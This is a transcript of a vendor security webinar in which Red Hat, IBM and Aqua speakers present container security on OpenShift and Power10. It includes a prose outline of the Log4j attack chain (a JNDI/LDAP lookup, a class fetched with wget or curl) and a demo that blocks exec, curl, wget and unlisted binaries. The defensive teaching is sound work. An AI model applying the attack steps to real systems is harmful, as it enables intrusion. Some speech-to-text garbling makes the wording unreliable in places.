Demystifying Security for App Modernization with Open Shift, IBM Power10 and Aqua Security

Security experts from Red Hat, IBM, and Aqua explain how OpenShift, IBM Power10, and Aqua’s cloud native security platform work together to protect modern cloud-native apps. The session includes a live demo of runtime security in action, showing how Aqua blocks attacks in real time through immutability, drift prevention, and policy enforcement across build, ship, and run.
Duration 1:03:04
Presented By:
Bill Gagliard
Partner Alliance Manager, Red Hat
Dimitrios Pendarakis
Distinguished Engineer & CISO, IBM Power
Philip TM Pearson
“There is no reason why anybody needs to get access to a running container. In a modern setup the container is immutable. If you need change, you rebuild through the declarative pipeline with policy checks, not a shell into production. Remove exec access and you close a major door.”
Phil TM Pearson
Field CTO, Aqua
Transcript
Hi Everyone. I'm Janine Donnelly, manager of webinars for Tech Channel, and I'd like to welcome you to our presentation, Red Hat, Aqua Security and IBM Power, demystifying security for app modernization.
We're delighted to have a distinguished panel of experts to share their insights with you today. Bill Gagliard has been in the high-tech industry for the past twenty seven years.
Before joining Red Hat, he worked at Amazon Web Services, Microsoft, and AT&T managing global enterprise customers.
At Red Hat, Bill works in the ISV organization and uses modern delivery methods to support a hybrid cloud strategy to help partners build and run applications on any cloud.
Dimitrios Pinderacas is an IBM distinguished engineer and the chief security officer for IBM Power.
In this role, he helps formulate and execute the security strategy and roadmap of IBM Power at the hardware, firmware, OS, and system management levels for both on prem and cloud offerings.
Phil Pearson is the principal security architect and zero trust subject matter expert at Aqua Security.
He's an experienced engineer and security professional with years of experience in building cloud technologies and tackling transformational challenges.
And so without further ado, Bill, I'll turn the presentation over to you.
Okay. Thank you, Janine. Well, good morning, good afternoon, and good evening. I know we have a worldwide audience on the bridge, and I appreciate you joining from wherever you are.
So let me take you through our agenda and what we're going to cover over the next hour.
I, as Janine said, is are from Red Hat, and I will be talking I'll be teeing up the webinar. I'll be talking about modernizing hybrid cloud with OpenShift and why secure OpenShift for containers and Kubernetes with Aqua Security. IBM will be talking about securing best practices, virtual machines, and container security, and then securing modernizations and talking about your journey with IBM Power.
And then towards the end, Aqua will be speaking about a framework for container security to support modern applications and then diving more into zero trust security principles.
So today is all about OpenShift, and OpenShift is our platform for containers and Kubernetes. We will talk about how we integrate with IBM Power, how Aqua provides a security platform for this service that is unmatched in the industry.
We see the adoption of OpenShift taking off, there's exponential growth that we've seen over the past three and five years with the platform. But what it is doing is it's empowering developers to innovate, providing a cloud like experience everywhere, and giving customers a trusted enterprise environment for containers and Kubernetes. The beauty of this is it can run anywhere. It can run-in the data center. It can run-in a hybrid environment or in your public cloud, and it provides a lot of options and ability for customers and businesses to move mission critical workloads and applications, to a cloud and and, the environment that, you've, you've chosen. So, OpenShift, available also as a managed service platform. We've had customers ask us for more options in deploying OpenShift into the cloud of their choice.
So we have, since, last year, and and there's been more announcements this year, introduced OpenShift as a managed service in AWS, Azure, IBM Cloud, and, Google. We've also done this with our other platform, which is Ansible for automation. So we see more and more customers adopting the public cloud and having that be a critical part of their IT transformation, and they want options to use OpenShift in that environment. So, this is something that we see a high rate of adoption for customers that want that choice. And they if they choose not to elect in running this and taking on running a Kubernetes environment in their data center, and they wanna run it as a managed service in their preferred cloud, that that is available as well.
We have a much better together story around working with Aqua and securing the environment. So this environment is, not gonna be as strong or as provide as much benefit to customers if it's not secured. So as we go through the webinar, you'll see and you'll understand how Aqua is providing a level of security to the OpenShift platform, that is like no other and making customers from any environment feel safe and secure when they deploy workloads to OpenShift.
And lastly, before I turn it over to IBM, we look at security from kind of three levels.
We secure the build, we secure the infrastructure, and we secure the workload wherever it runs. And as we go through this and and you hear from IBM and you hear from Aqua, you'll understand deeper how we go into these three categories and wrap OpenShift in a very secure way. So with that, I will turn it over to Dimitrios to take us through cloud native.
Thank you very much, and thanks everybody for joining us here for this webinar. I wanna start by motivating a little bit, you know, why we need container security solution, like the one provided by Agua, and what are some of the benefits and challenges in the security space that containers provide? So let's start by an overview of what is a cloud native application. We hear this term a lot these days, And our applications, as you see here, that are made to run on the cloud, a variety of different cloud instantiations, private, public, hybrid.
Applications are obstructed from the infrastructure. So as a developer, you don't need to be concerned about what type of infrastructure will it run at, what are the characteristics of the underlying platform and so on.
It is typically based on micro services and containers, although some of these principles of container sorry, of cloud native are infused across all types of development these days. And then they're orchestrated for operational management, easy scaling, resiliency, easy updatability.
So these principles are kind of highlighted in this next page, where we look at some of the comparisons and contrasts between development of cloud native applications in containers and how this compares to virtual machine environments, which is kinda like shown here as traditional environments. So across all of these categories, you see the differences. So in cloud native, if we start from the top, you have this so called shift left, where instead of having infrequent releases, you have a continuous cycle where you have automated development, testing, and deployment, and this allows you to handle vulnerabilities much faster.
So as CVEs and vulnerabilities are published, you can integrate the remediation of these with your development life cycle, and you don't have to worry about patching, bringing down applications and so on. Another aspect which is tied to the first one is the fact that traditional environments tend to be very persistent, as opposed to ephemeral, again, that's the idea that can delete and deploy new containers without impacting your application, and by doing this continuously, again, you stay ahead of the threats.
Another aspect here is that in terms of isolation, having strong fences between different applications and containers, in the case of cloud native and container based workloads, relies on a shared kernel, which essentially abstracts, gives the illusion of having a dedicated OS to containers, as opposed to relying on hypervisor or hardware isolation in traditional environments, but we should keep in mind that when we talk about security properties and isolation in particular, the infrastructure continues to matter, so you have to have strong isolation across the stack and enforcement of least privilege in the workloads.
And finally, some other points here. With containers, you tend to use very heavily open source code, which again tends to be better from a security point of view, because it's code that has been exposed to large people in communities that have the ability to review and vet, if you want.
Finally, in terms of software supply chain, which is an item that has attracted a lot of attention recently, there are concerns, and in the case of traditional environments, you rely mostly on proprietary software that is very hard to check.
And in the cloud native case, again, there's commonly reuse of public images, libraries and so on that allow better traceability and better provenance of the different components, and these feeds into better management of supply chain risks.
So let's talk a little bit about how the tasks that one has to do compare. So we talked about some of the development characteristics. Now when you operate an application that is based on VMs versus containers in cloud native security, you see here that in all cases, you have to do some of the common tasks that are associated with security operations, right? So you have to worry about patching, application hardening, compliance checking.
You have to handle privileged user monitoring and audits, right? And then you also have to look at some of the application security considerations, like how do I secure my stack in the VM case from the VM through the application layer? I have to make sure that my networking and my storage are configured correctly. I have to make sure that my virtual machine image is secure, has scanned for vulnerabilities and so on.
And then once the application is instantiated, I have to consider how do I ensure that I have the best runtime security, right? So if we look on the right, so consider here you're migrating from a VM based application, or workload to a cloud native one, and you see here that you still have to do the tasks or at least some of the tasks associated with managing the OS. So you see here the blue, the deep blue color signifies things that you have to take care of at the OS security.
But a lot of these tasks now benefit from the shift left and the operational tasks here that you see on the bottom when it comes to things like hardening and so on are reduced, because let's take an example, right? So vulnerability management, now you have to do less of that because your VMs only have, let's say, kernel components, they don't have applications and libraries, and containers, as we discussed, you have to just rebuild rather than patch. So your overall load in terms of performing vulnerability management is decreased, and it gets more automated now as part of the DevOps pipeline. Similarly, tasks like auditing and monitoring privileged users are reduced, because now there's much less need for an administrator to log on to a host operating system, a worker node as we call it, because there's no need to configure applications, you know, libraries, networking and so on.
This is all done at the application level, at the light green box that you see at the top. So some of your traditional VM management tasks are simplified and reduced in intensity, but now you do have to make to realize that benefit, have to do some of the tasks on the top, the green colors here, that have to do with like container image security, registry, orchestrator, and so on. And we'll talk about some of this in the next slide.
And finally, we still wanna emphasize that although infrastructure is obstructed, a strong infrastructure with strong platform security still is essentially essential and makes a big difference in terms of anchoring this whole application and cloud native platform on good integrity and isolation. So let's talk a little bit about some of the challenges, why we need a container security solution. And as you see here, this is a typical life cycle of container development, and the elements that you have here across build, ship, and run, they all introduce additional security considerations.
Again, as you build the image and you test, you make sure that they don't have vulnerabilities or rogue elements and so on. As you manage registries, you have to make sure that they have the right access control and the right container images in them and so on.
So as you see here, OpenShift provides essentially the bedrock for orchestration security, but this must be complemented by a container native security platform to provide security across the full lifecycle. And some of the targets of this container native security are shown here, which kind of breaks it across the categories that we were seeing in the previous slide. So you have security considerations for the images, right? So are there configuration defects? Has somebody configured, let's say, network security in a wrong way or credentials in a wrong way? Are there any embedded components that might be malicious, right? So this is kind of like the more traditional malware detection, antivirus if you want, making sure that you don't have anything malicious.
Sometimes developers make mistakes like putting clear text secrets in the images and you want to be able to detect and prevent that.
Similarly, you see here in the registry components, you have secure images, but the images go on the registry. This registry has to be secure in terms of how it gets accessed. It has to authenticate and authorize users in terms of what images they can upload or, retrieve. And of course, you have to manage freshness, right? So once images are old, deprecated, they have vulnerable libraries and so on, they have to be removed. And then when we go to orchestration, you have similar concerns, right? So who can get privileges to perform administrative actions to orchestrate, to deploy, and that includes concerns around how are containers networked and how they are allowed to communicate with each other, what type of network security settings are employed.
And you see here in the last two categories getting into containers themselves, some of the similar concerns that we had previously, runtime software vulnerabilities that are typically, as I mentioned, not patched, but are remediated by deploying new containers.
And then at the end, you see still infrastructure considerations, right? So we talked about the fact that you're shifting a lot of your operations in the container space with DevSecOps, but you still have to ensure that your host OS, your worker nodes do not contain vulnerabilities, you're protecting the file systems, and so on.
Sorry, it looks like there was some jump on the slides here, apologies for that. Let me go back here. Okay. So with that, I wanna talk a little bit about, Bill mentioned, the best combination of security between Red Hat, IBM Power and Aqua. So I wanna give some examples of why we think Power and the Power ten processor and systems are the best platform to deploy cloud native workloads. And this is an example when we built the Power ten processor.
People may remember a few years back, we had a lot of excitement and, of course, concern in the industry about microarchitectural attacks. These are kind of like your side channel attacks, Spectre and Meltdown for those who remember these buzzwords. And, of course, the whole industry was very concerned about all of these attacks that were coming out in the literature and also demonstrated in practice. We had the benefit of going through the design of the Power ten processor at the time, and we took a painstaking view of all these possible side channels that were published and theorized and demonstrated to make sure that the processor is architected in such a way that it protects from all of these classes of speculative execution side channel attacks. And these protections are built on the hardware, on the core.
They do not require any patches in firmware or the operating system and so on, which is what is shown on the left that as the industry was responding to these, often there were mitigations that took a very heavy toll and had a very heavy overhead. So Power ten basically allows you to mitigate across all of these attacks with very, very little overhead.
Another example here, again focusing on the infrastructure, is another set of vulnerabilities, also kind of like capturing a lot of interest in the industry a few years back that had to do with vulnerabilities in service processors, what is often referred to as BMC, which allow servers to be managed remotely. So these are vulnerabilities that apply to a system that is separate from the main CPU system. So you can think of you have your CPU, you have your service management network, and if somebody can come through vulnerabilities in the service management system, subsystem, then they could potentially get access to sensitive data and customer workloads that are being processed by the CPU. So what power systems did was to treat the CPU and the service processor as a different trust domain, and this can be viewed visually as kind of like a firewall here, where the service processor only gets access to the absolutely necessary resources that it needs to perform its tasks.
This is what we call a combination of allow list and block list, which is implemented again in the hardware, in the processor itself, shown here visually as a firewall.
But then in addition to that, our newer Power ten systems, the mid range and scale out have additional functionalities to protect the integrity of the complex and make sure that there's things like secure boot to verify the integrity of the image that is running on the processor. And by image here, I mean firmware image, not container image, apologies for the terminology overhead. So the bottom line here is what these capabilities do is they strengthen the security of your service processors, but also they effectively building if you want on the concept of zero trust, these two systems do not have to trust each other, and even if somebody is able to breach into the BMC subsystem, the damage that then can be done on the CPU is limited, right?
So that's the benefit. And let me move to an additional point where infrastructure matters, and that has to do with encryption, right? So often the workloads will require encryption, which is, of course, one of the best ways to protect data, assuming that you know where to do it, how to do it, and what algorithms to use, what key management systems to use.
So Power ten makes another set of breakthroughs, I would say, in terms of encryption. So first of all, when we talk about encryption, the pyramid on the left tries to explain what layers encryption happens in.
From the bottom, which is kinda like encrypting data across a very high granularity or coarse granularity, so things like encrypting data in the storage system, or encrypting data in memory, which happens in part ten. So all data in the CPU memory is encrypted in part ten. This is done without any additional setup management, you don't have to configure it, turn it on, it's always on, and it pretty much has no performance impact, right? On top of that, there's different layers where one may want to apply encryption at the level of the virtual disk, or at the level of the file system or the level of, applications themselves, right?
For all of these cases, Power ten provides very fast encryption with four times the number of crypto engines in every core compared to Power9, and so this accelerates things like AES, which is the most common symmetric encryption algorithms by a factor of two point five times, and we also have support for quantum safe cryptography and fully homomorphic encryption to be able to do this at very high speed. I'll try to wrap up here with some points about security here requires a holistic approach. It's not just a set of features that I tried to cover a sample, but it relies on building secure systems securely through principles of secure engineering, as noted here.
There's features, individual features that are talked about around firmware integrity, encryption, acceleration of encryption, and so on.
This whole question, how do we simplify security operations?
Again, the things that we touched in the beginning around the liability management and compliance verification, and here's where Aqua will come next, where it makes container security much stronger and easier to do across the build, deploy, RAN profile.
And then finally, as a platform, we strive to achieve certifications that prove our adherence to these principles, including Zero Trust security.
I'll flash a slide here about quantification to some extent of our strength in terms of having orders of magnitude less vulnerabilities in our infrastructure, our hypervisor, PowerVM, compared to some other hypervisors in the industry, but I'll put a disclaimer here, this is kind of like a result of our rigorous testing, smaller code base, secure engineering processes and so on, but it's not really, should not be interpreted as a way to quantify security benefit. It's just an indication, you know, we take pride on this, but it's not like direct quantification of security benefit. And with that, I will reiterate the point here that the combination here of IBM Power with what we think is the most secure hardware with Red Hat leader in hybrid cloud and Aqua, the leader in cloud native security, is the best of all three worlds here.
And our partnership with Aqua is based on the recognition of the importance of container security, and basically this is your best of breed solution for container and cloud native, workloads. So, I'll I'll hand over to Philip here. Thanks, everybody, for, for being with us.
Okay. So thank you, Demetrius. Okay. I will try not to break the presentation because I'm going to share my screen. Bear with me.
Janine, can you confirm when you can see my screen, please?
And looks like we're good to go, Phil.
Okay. Well, welcome, everybody and, thank you IBM and Red Hat for giving us this opportunity and for the kind words. And welcome to the audience. So first things first then, yes, we're going to look at a cloud native approach to zero trust, But we're gonna do this in a really interesting way.
We're gonna do a small demonstration, where we're gonna look at a few controls. Actually, we're gonna defend against the line of talking production, which is really interesting. And I've provided us with a Internet facing web server, which is gonna enable me to be able to do that, which is based on an OpenShift cluster, on the IBM Garage. So we've got all of the components in place.
I'm gonna take you through a few slides, but most important from this slide here is ACWA's understanding of zero plus alliance with NIST SP eight hundred two zero seven.
Okay. So quick agenda then for this part of the, the webinar. So we're gonna focus today on the zero zero plus model, but it will all come clear as we go through the presentation.
And we're gonna do that by looking at a cloud at the cloud native attack kill chain, and then we're gonna use that kill chain and superimpose that on on a real world, kill chain, and you'll see how those things have lined up. And then we're gonna defend against that kill chain, as the live demonstration.
And finally, we're gonna wrap up by looking at some of the core operating principles and capabilities of both Aqua and container security as a general. And then we're gonna look at a framework for Zero Trust. In other words, all the capabilities that you're going to need as you move on your journey into the cloud utilizing OpenShift and then hopefully acquire security for your cloud native security solution of choice.
Okay. So within the Zero Trust, model domain, there are five, five domains rather. And the one that we're gonna focus on today is the application workloads. And in fact, ACWA does cover some of these other areas as well.
But for the purpose of this presentation today, we are going to focus on the application workload. Okay. As we move forward into our journey into the cloud, then we have to think about how we could be potentially attacked in the cloud.
And so what we've done here is we've put together a cloud native kill chain to demonstrate, almost every single attack is done using one or many of these patterns that we're gonna look at today.
So first things first, the the bad guys or the attacker, need some kind of access. Now one of the one of the first principles that we're gonna talk about today that differs potentially from what you how you think about security from a zero trust perspective, we're now saying a shoe bridge.
And what we mean by that is that previously, we always architected our environment to think about the future. Right? What at some point in the future, we know that we are going to be attacked. Potentially, we are going to be a breach. In the, server trust environment, we're saying we've already been breached.
The bad guys are already through the door, and now how do we architect and defend against the live attack in production assuming that it's already happening?
Okay. So that's a strange way of thinking because that means, okay. So people are already there. Now you think about the cloud and think about, the way that people get access to these environments.
You're in a shared environment. Right? So you're in a shared instance. The diff the what separates you from another client is a hypervisor, and we have to have some kind of segregation. There has to be the ability, to to remove the capabilities for people to be able to reverse from one account to another account, and all of that is handled mostly in a cloud, shared model by the cloud service provider.
From your perspective, what you need to be able to defend against is internal the internal threat and the external threat. And if you look at the FBI cyber security statistics on the investigations that they're called in to investigate, more than eighty eight percent of those investigations, are resolved as the attack came from the inside.
Okay? And a lot of those are gonna be misconfigurations. Many of them are gonna be people on the inside passing on credentials to somebody on the outside, or some of them could be some kind of, you know, email that's gone out there and somebody has clicked on a link to change their password and give somebody access. But, actually, hacking from the outside of the nation state attack is quite rare. However, it is obviously, people do that, and that does happen, and we have to be able to defend against all of them.
Okay. So the first thing when we look at the attack kill chain, the first layer that we need to be able to protect is access.
Okay. So how do we do that? How do we do that in the live workload here? So I'm not necessarily talking about identity here.
I'm talking about how do somebody gain access to a running container.
Now in the cloud, one of the first architectural principles that you need to architect towards is immutability.
And immutability, if you think about immutability, it's the opposite of mutation. Right? Mutation is changed. In the cloud, we don't change.
Okay? So containers are inherently immutable. It's people who who've changed that. So if a container is immutable, it means that nothing changes in the live environment. And exactly what Dimitri said, when we're talking about build, deploy, and run, then in that environment, we we we have to ensure that as we do that, from the moment that we build that container, that container doesn't change thereafter.
And if we need to make a change or create change or enact change to that live workload, then we do that by the declarative pipeline, which is subject to peer reviews, scrutiny, and policy policy checks. Okay? And this is the bulk of the work that ACWA will do for you. Now once somebody has got access, remember this is zero trust now.
This is how we're thinking in this in in this modern world. If somebody's already got access, then what's the next layer? Because, you know, they already have access to your system. I mean, internal people need access.
Right?
If you forward fix, meaning that you don't go through a declarative pipeline, then you have to give somebody who's normally engineer level capabilities access to your live environment, probably through some kind of bastion server or a jump box. They're going to need privileges. They're going to need authorization, and they're going to need the capabilities to create that change, to patch that server or that code in the live environment.
So to give them access means that you've lost all trust.
So, again, the the architecture principle that we wanna talk about mostly today in Zero Trust is is an usability. So first things first, let's remove all access to a running container. There is no reason why anybody needs to get access to a running container. So we're gonna the first thing that we're gonna look at later is how do we remove that access. The second thing then is once the attackers have got access, remember, we're assuming breach, then they need to get the payload onto the system. They have to get the malicious software there somehow.
And once it's there, they have to run it.
Okay? So they have to execute the binary. So just to reiterate then, somebody's gonna get access. Once they get the access, they then have to get the payloads onto system.
And once they've got the payload onto the system, they have to execute it.
So the three elements that we're gonna focus on today when we're defending against the live attack in production, which we're going to do a little bit later on, is we need to be able to terminate the command that gives them access. Then we're gonna deny the pilot payload, and then the final layer is we're gonna block the execution.
Okay? And at every level, we're gonna demonstrate if these controls are not in place, what could happen.
Now in order to do that, let's have a look at a real world live attack chain here. So one of the ones that was the most prominent or the most prominent last year was Log4j. In fact, it was almost exactly this time last year, and we'll have a look at lots of j in a few minutes in my code.
Let's just describe the screen, and then we're gonna move into the demo. So first things first, then if we look on the right hand side, we've got a malicious Java class. In this case, the idea that's the payload. We've got to get that file, that Java class, where it's a file.
We have to get that file onto our server and then run it. To do that in this particular case then, the attacker through in fact, this was first seen through, if I'm right, this was the Minecraft. Yeah. That's right.
So the Minecraft, gave so the the servers that was controlling the chatbots, Log four j was implemented as a package within that Java app. And then as people which was just command entry rights. These are just field entry fields.
And the code in this particular case was a BASE sixty four command, and that command, which was encrypted using BASE sixty four, kind of, pointed to the LDAP server, which was the command and control server that was managed by the bad guys in the cloud. Okay. So first things first, once you logged out the application, and we'll look at that in a second, then the Log four j program read through that script, that base sixty four command, which, which went which reached out to that LDAP server using JMDI, downloaded that Manasys Java class on the right hand side, and then on the right there, you can see using Wget and curl, it downloaded that. So typical Manasys capabilities, it downloaded that file. It executed it as part of its its activity there. As you can see, they're using to mod. It executed that so it was able to run it, and it was that that gave the remote access to that server.
So once you run that malicious Java class, then remote command executables could be gained by the bad guys. Okay? So it's all about getting the payload onto that server, but it was getting out to the server, downloading, executing, and then once it was executed, that gave the bad guys the ability to be able to, to gain access to that server and take those companies apart.
And the reason we know this is because our own Aqua research team, Nautilus, as soon as this attack happened, they put the honey pots out there. They observed thousands of these attacks. Obviously, we put out our honey pots that was exposed to Log4j, and we just watched everything they did. And as a consequence of that, we was able to then build the technology that would defend against them.
So real quick then, let's just have a look at, a real world example in my code.
So, Janine, are you looking at my code now? Let me just confirm that switch. Okay.
Yes, Bill. It looks good.
Perfect. Okay. So what you can see here so I I've got my little application here. So I'm just gonna run this application.
And as I run this application, what you can see on the right hand side there, as you can see, Log four j. Right? Log four j is a third party package which I've implemented, which will tell me everything I need to know about when I boot up this application, what's happening. The six elements that Log four j actually looks for, it's looking for errors, warnings, information, debug trace, and fatal errors. Okay. And in in this particular case, then if you click on this link here, which I won't do because it will take me to another screen, which I can't share, that will take me to my command and control server that enables me then to be able to download that payload.
So Log4j as a tool, all that it does is it logs out all of that information based on those six capabilities, errors, fatal, etcetera. But in the case of the the barcode that was used here, it actually reached out to that LDAP server in the cloud and downloaded that malicious Java class, which gave remote command executable.
So okay. So let's go into the demo. What you're looking at here is I'm not gonna go through ACRA in too much detail, but I am going to look at the runtime policies, which is gonna help us defend against and put into place those three layers that we've been talking about in the presentation so far. But real quick then, let's have a look at the setup.
So what we've got here, you can see on the screen now on the bottom left, I've got a test namespace And within that so this is my OpenShift cluster. But then this is a cloud facing web server.
Okay? So that's currently at the moment. That is a that's open to attack. We're going to put in just a few controls that would prevent those attacks from being realized.
Okay? And just for everybody's information, as you can see here, everything is in OpenShift, I'm gonna switch over to OpenShift now before we come back to AQUA to have a look at the account. So just bear with me a second. This is logging out.
Okay.
Let me just get my password.
Okay. So, Janine, can we see OpenShift?
We sure can.
Okay. So what I've done is I, last night out to me up twenty two thirty seven, I installed Aqua into my OpenShift cluster. And if we look at the Aqua security operator, what you can see are all these APIs here. But the most important one are the enforcers.
I mean, they're all important. You need all of them, but the enforcers are like a runner. So the enforcers allow us to, using the API, allow us to defend and place controls on our live containers that enable us to be able to switch on different controls, and I'll bring that to life when we go back into ACRA in a few minutes. Okay.
So, basically, what I've done here is that based on my OpenShift cluster in the namespace test, I've deployed these enforcers and these enforcers now will allow me to be able to enact certain controls that meet my standards and policies and would enable me to be able to answer three core questions.
The first the first question that we need to think about is can we identify vulnerabilities? Okay. We've got an enforcer that will help us do that. The second question is can we capture misconfigurations?
Bear in mind that more than eighty eight percent of all issues are caused by misconfigurations.
And then the final thing is, can I defend against the live attack in production? And that's exactly what we're going to do next. So if I go down to my workloads into the POS, you can see here I've got my NGINX server.
So the NGINX server has been deployed into that OpenShift cluster. If I go over to the terminal, and let's have a look.
Okay. And as you can see here, let me as you can see here, I've got root access to a running container. So this is Bob.
If I've got root access to a running container, it means I can do anything to this container. So if this container has got my core website and that website's linking out to other applications such as your online banking, for example, then this is my routine. Right? So this is my web server.
This is my front door, and I've got real access to it. So that would be bad. So we as an engineer, you would definitely not want to give me this. And so we have to have the ability to be able to remove this access.
Now remember, that this could be done as a misconfiguration. Now what I can absolutely guarantee is that when I do health assessments, in almost every case, when I look at things like Docker containers, I can see that Docker containers by default are delivered through, and customers do not, they adjust that.
In many cases, I go to some customers and they've got fifty thousand containers, hundred thousand containers deployed as room.
Okay. So we need to be able to provide a guardrail that would prevent against that. The way that you would do that in AQUA is that you would have a policy enforcement point within your declarative pipeline, and as you build your container, you scan it for vulnerabilities. That's the first thing you're going to do. Aqua has got that enforcer in there, and what it will do is it will check your image against in your container against the CVE database.
Okay? And if it identifies any vulnerabilities, potentially, you could block the build at that point. That's up to you. Normally, on high end critical vulnerabilities, that's exactly what you would do.
But let's assume now that you allow that through or that it doesn't find any vulnerabilities. The next thing that you're gonna want it to get is what we call them as insurance policies. An insurance policy would be, for example, it would check to see if the container was built as ripped. That would be one.
Another one might be that you would check that your that your engineer is defined enough to see the user in it in its Kubernetes pod.
Because if you haven't put a ceiling on the CPU, then you open Stdots.
So you would definitely want to do that.
Okay? So the idea in the cloud and one of the core benefits of the cloud is that we deploy exactly what we need when we need it. If we need more, we scale out. If we if we need less, we scale back.
So you want the ability to scale, but you have to put the ceiling on that. That's best practice. In fact, that's regulated. You have to have limits.
So those limits, should be defined in the configuration. If they're not, that would be considered a misconfiguration. And at that point, you've got a policy enforcement point within Aqua that would block that build that's targeted for production from going any further in the pipeline. This is one of the core benefits of Bipedrive.
Okay. Back to the demo then. So if we just clear the screen.
Okay. As you can see here, I've got full access as root. So what what to do about that? So the first thing, if we go back to Aqua, the first thing that we talked about in the attack kill chain is how do we prevent access? So what you can see here on this screen is that we can we've got an enforcement mode.
Okay? So we can either just audit. So that's just obviously, that's just audit. That's just information. Or we can enforce, which now means that we're gonna block activities or behaviors that we don't consider appropriate.
Okay? And there are a lot of controls here that you can use. And one of them, right at the very top here, is to block container exec.
Okay? So if I now check that, if I'm gonna enforce it and then save the rule, go back to OpenShift. Let me just come out of this terminal. Go back into the terminal. And as you can see, this terminal connection has closed. If I try to reconnect to that terminal, it's not going to allow me in.
So I haven't changed the application in any way. This is this is a, non corruptive way of doing this. Okay? It does not disrupt anything.
All that's doing is it's preventing that capability.
So as a as a backstop and a guardrail, you wanna be able to prevent anybody from accessing running workload, a running live workload. And if there is a problem with that workload and you do need to enact a change, then you do that in dev and test, push that back through the pipeline pipeline where it's subject to all of that scrutiny.
It's really quick to that scrutiny and then and then push that into life. So rather than fall with fix, we replace the passcode with a good code.
Okay? And you need this policy in place here, and that would prevent anybody from accessing a running container. But let's just sit back a minute and just think about what I just did.
I've just blocked any access to my running workloads. So when we think about the attack kill chain, if nobody can get access, then they can't download that payload.
So already in one simple control, I'm changing your world.
Okay. So let's let's go back then. Let's but let's carry on because we have remember in Zero Trust, we assume breach. Let's assume that somebody can get around there, so we'll untick that.
We'll go back into audit mode and we'll save the rule. We'll go quickly go back just to test the theory here. Let's reconnect, and we should get if we have a look, we should get there you go. I'm back. And let's do a who.
Am I, and we can see. I'm rich. Okay. So we're we're back to where we was at the beginning. So now we've got this, vulnerable and exposed situation. So what to do about that? So if we think about the second policy then, so we're talking about downloading the payload.
Now to do that, we can block curl. We can block Wget, etcetera, so all of those kinds of things. But we could also block bash, shell scripts, etcetera, any any any of these kind of things. But just for a visual on this one, let's just have a look at that.
So if I if I list out here all the files in this folder, as you can see here, I can do that. Right? That's a Linux capability and I've got no problem in being able to run that. So if I go back up here, if I block, let me just find my control.
I think I've that. Executive was blocked. Where are you?
There we go.
So if I just block that command, add that rule, I need to enforce and save.
Go back and try and run that command again.
What you can see is the permission is denied. So there you go. So I can block any Linux capability, but let's move on quickly.
If I go back in here, let me turn off that.
And let me remove that because I'm gonna need that in a minute. Let me save that rule. The final thing that we're gonna look at from a control perspective is something that we call drift prevention. So I need to in order to do this, I need to save that rule. Let's just go back. So what you can see here is that we've got something called drift prevention.
Now drift prevention prevents ex pupils that are not in the original image from running. Now this is patient number one, Aqua. This is the magic. Okay? We we we offer a guarantee to prevent a zero day.
This is how you do it. And what I mean by this is that when you build your container from your image, at that point, we take a hash of it.
We also take a date and time stamp at that point.
So if you're reputable and somebody tries to execute a binary after that point, remember, you're still in the pipeline here. You're not even live yet. When you push that into live, if somebody tries to execute a binary or a command after that point, we're going to block it to prove that.
If we go back into here, we'll click let me clear the screen.
Let's have a look let's have a look at a simple date object in Linux. Okay? So a simple capability there. If you type in date, you get the date.
What we don't have in here so let's create a new object. Well, first of all, let's test that. It's called power date. Okay?
So is there a Linux capability called power date? No. There's not. So I'm gonna create that, that object there, and then we're gonna try and run it.
Now that wasn't part of the original image when I built and deployed this application. So it stands to reason then that the date object is, but the power day does not exist. So let me create it first of all. I'm gonna do that because I'm gonna take a copy from the binary file, so it's already executable.
I'm gonna take the date as we just said. I'm gonna put it back into the binary file, so it is executable.
I'm gonna call it power date.
Okay. Now at that point, I haven't created a drift event, but I have created a new object. Now I'm gonna run that power date. As we saw previously, it was not found. Now it is.
So I've just created a drift event. Okay? And it allows me to do that. But if we go back to Aqua, okay, and if we now enforce the policy down here, risk prevention, we now save that rule, go back to OpenShift, rerun the command power date, and what you can see is that my permission is denied. What that means is that once my application is deployed in that container, you can no longer run any subsequent binaries.
You cannot do anything else with this immutable live environment.
Watch Next